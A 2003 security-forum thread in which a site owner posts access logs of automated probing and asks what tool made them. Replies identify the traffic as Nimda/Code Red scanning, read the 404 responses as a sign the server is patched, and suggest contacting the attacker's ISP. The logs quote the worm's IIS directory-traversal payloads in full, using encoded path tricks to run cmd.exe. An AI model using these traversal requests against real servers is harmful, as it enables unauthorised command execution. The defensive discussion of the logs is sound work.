+ Reply to Thread
Results 1 to 5 of 5
  1. March 5th, 2003 12:28 AM #1
    slick_shoes
    slick_shoes is offline
    Junior Member slick_shoes has a spectacular aura about slick_shoes has a spectacular aura about slick_shoes has a spectacular aura about
    Join Date
    Aug 2002
    Posts
    11

    Question Whats he using... ?

    For the past 17 hours, the same IP has been giving me the following log files on my web server:

    [04/Mar/2003:00:39:16 -0800] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 327 "-" "-"
    [04/Mar/2003:00:39:18 -0800] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 325 "-" "-"
    [04/Mar/2003:00:39:19 -0800] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 335 "-" "-"
    [04/Mar/2003:00:39:20 -0800] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 335 "-" "-"
    [04/Mar/2003:00:39:20 -0800] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 349 "-" "-"
    [04/Mar/2003:00:39:22 -0800] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 366 "-" "-"
    [04/Mar/2003:00:39:22 -0800] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 366 "-" "-"
    [04/Mar/2003:00:39:23 -0800] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 382 "-" "-"
    [04/Mar/2003:00:39:24 -0800] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 348 "-" "-"
    [04/Mar/2003:00:39:26 -0800] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 348 "-" "-"
    [04/Mar/2003:00:39:26 -0800] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 348 "-" "-"
    [04/Mar/2003:00:39:27 -0800] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 348 "-" "-"
    [04/Mar/2003:00:39:28 -0800] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 339 "-" "-"
    [04/Mar/2003:00:39:29 -0800] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 339 "-" "-"
    [04/Mar/2003:00:39:30 -0800] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 349 "-" "-"
    [04/Mar/2003:00:39:31 -0800] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 349 "-" "-"

    He is obviously using a "tool" to do this, seeing how rapid the requests are, and the fact that hes been doing it pretty consistently over the past 17 hours... do any of you know what program he is using? I would think the logs would be a pretty tell tale sign of what he was using...

    Also, if these attacks go on any longer, im going to want to take some kind of action against him. What steps would be plausable in this situation?

    Thanks,
    slick_shoes
    Reply With Quote Reply With Quote
  2. March 5th, 2003 12:46 AM #2
    powertoad5000
    powertoad5000 is offline
    Senior Member powertoad5000 powertoad5000 powertoad5000 powertoad5000 powertoad5000 powertoad5000 powertoad5000 powertoad5000 powertoad5000 powertoad5000 powertoad5000
    Join Date
    Jun 2002
    Posts
    405
    Not completely sure, but this looks pretty much the same as another set of logs which have been posted just recently in another thread. You can find more information in the following threads:

    Apache Security Question
    hacked
    Reply With Quote Reply With Quote
  3. March 5th, 2003 12:46 AM #3
    indolent
    indolent is offline
    Senior Member indolent has a spectacular aura about indolent has a spectacular aura about
    Join Date
    Jan 2002
    Posts
    121
    Contact the person's ISP and give them the IP and the time table of the events. They'll choose their own course of action.
    what is love but contempt for hate?
    Reply With Quote Reply With Quote
  4. March 5th, 2003 01:30 AM #4
    Tiger Shark
    Tiger Shark is offline
    AO Ancient: Team Leader Tiger Shark has a reputation beyond repute Tiger Shark has a reputation beyond repute Tiger Shark has a reputation beyond repute Tiger Shark has a reputation beyond repute Tiger Shark has a reputation beyond repute Tiger Shark has a reputation beyond repute Tiger Shark has a reputation beyond repute Tiger Shark has a reputation beyond repute Tiger Shark has a reputation beyond repute Tiger Shark has a reputation beyond repute Tiger Shark has a reputation beyond repute
    Join Date
    Oct 2002
    Posts
    5,197
    It's a pretty basic Nimca/code red automated thing..... See it all the time on my boxes.... If you are patched... which you appear to be by the 404 error codes in the log you have nothing to worry about......

    Complaining to the ISP will become a full time job..... If it's not a pain for you go ahead and send the logs..... But it will become a problem if you host web sites....
    Don\'t SYN us.... We\'ll SYN you.....
    \"A nation that draws too broad a difference between its scholars and its warriors will have its thinking done by cowards, and its fighting done by fools.\" - Thucydides
    Reply With Quote Reply With Quote
  5. March 5th, 2003 01:56 AM #5
    slick_shoes
    slick_shoes is offline
    Junior Member slick_shoes has a spectacular aura about slick_shoes has a spectacular aura about slick_shoes has a spectacular aura about
    Join Date
    Aug 2002
    Posts
    11
    Thanks for the replies...
    Have a good day!

    slick_shoes
    Reply With Quote Reply With Quote
« Previous Thread | Next Thread »

Bookmarks

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts

Forum Rules

 Security News

     Patches

       Security Trends

         How-To

           Buying Guides